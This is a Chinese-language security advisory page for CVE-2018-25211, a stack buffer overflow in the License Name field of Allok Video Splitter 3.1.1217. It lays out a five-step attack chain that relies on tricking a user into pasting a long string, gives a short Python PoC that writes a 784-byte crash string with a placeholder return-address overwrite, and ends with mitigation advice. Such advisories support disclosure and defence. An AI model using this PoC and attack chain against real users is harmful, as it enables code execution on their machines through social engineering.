CVE-2018-25211 CVSS 7.8 高危

CVE-2018-25211 Allok Video Splitter缓冲区溢出漏洞

披露日期: 2026-03-26

来源: [email protected]

漏洞信息

漏洞编号

CVE-2018-25211

漏洞类型

缓冲区溢出

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Allok Video Splitter

漏洞概述

Allok Video Splitter 3.1.1217版本中存在严重的缓冲区溢出漏洞。该漏洞源于软件在处理用户输入的“License Name”注册信息时，未对字符串长度进行有效的边界检查。本地攻击者可诱导用户在许可名称字段中粘贴超过780字节的恶意字符串，当点击注册按钮时触发溢出，从而导致应用程序崩溃或执行任意代码。

技术细节

该漏洞属于典型的基于栈的缓冲区溢出。在Allok Video Splitter 3.1.1217的注册窗口中，程序直接将用户输入的“License Name”数据拷贝到栈上的固定大小缓冲区中，该缓冲区大小约为780字节。由于缺乏必要的长度验证机制，当输入数据超过该限制时，多余的数据将覆盖栈上的返回地址及相邻内存区域。攻击者可以精心构造恶意载荷，利用特定的偏移量覆盖返回地址（EIP），使其指向Shellcode或ROP链。尽管攻击需要本地访问和用户交互（UI:R），但一旦成功，攻击者即可获得当前用户的权限，实现任意代码执行或造成拒绝服务。

攻击链分析

STEP 1

侦查

攻击者确认目标系统上安装了存在漏洞的Allok Video Splitter 3.1.1217版本。

STEP 2

武器化

攻击者编写脚本生成一段超过780字节的特定恶意字符串，该字符串包含填充数据和用于控制执行流的指令。

STEP 3

投递

通过社会工程学手段，诱导受害者将生成的恶意字符串复制并粘贴到软件注册界面的“License Name”输入框中。

STEP 4

利用

诱导受害者点击“Register”按钮，软件处理输入时触发缓冲区溢出，覆盖返回地址。

STEP 5

执行

程序流程被劫持，跳转到攻击者指定的代码地址执行指令，导致系统崩溃或植入后门。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2018-25211
# This script generates a malicious payload to trigger the buffer overflow
# in Allok Video Splitter 3.1.1217 via the License Name field.

def generate_payload():
    # The buffer overflows after approximately 780 bytes
    padding = "A" * 780
    # Overwriting the EIP (Instruction Pointer)
    # Specific address may vary based on OS version, using placeholder
    eip_overwrite = "B" * 4
    # Optional: NOP sled followed by shellcode
    payload = padding + eip_overwrite
    
    try:
        with open("cve_2018_25211_poc.txt", "w") as f:
            f.write(payload)
        print("[+] Payload generated successfully!")
        print("[+] Content of 'cve_2018_25211_poc.txt' should be pasted into the 'License Name' field.")
    except IOError as e:
        print(f"[-] Error writing file: {e}")

if __name__ == "__main__":
    generate_payload()

影响范围

Allok Video Splitter 3.1.1217

防御指南

临时缓解措施

目前厂商尚未发布补丁。建议用户不要在软件注册界面粘贴来源不明的长字符串，并在操作系统中以最小权限原则运行该软件，以降低潜在代码执行带来的风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表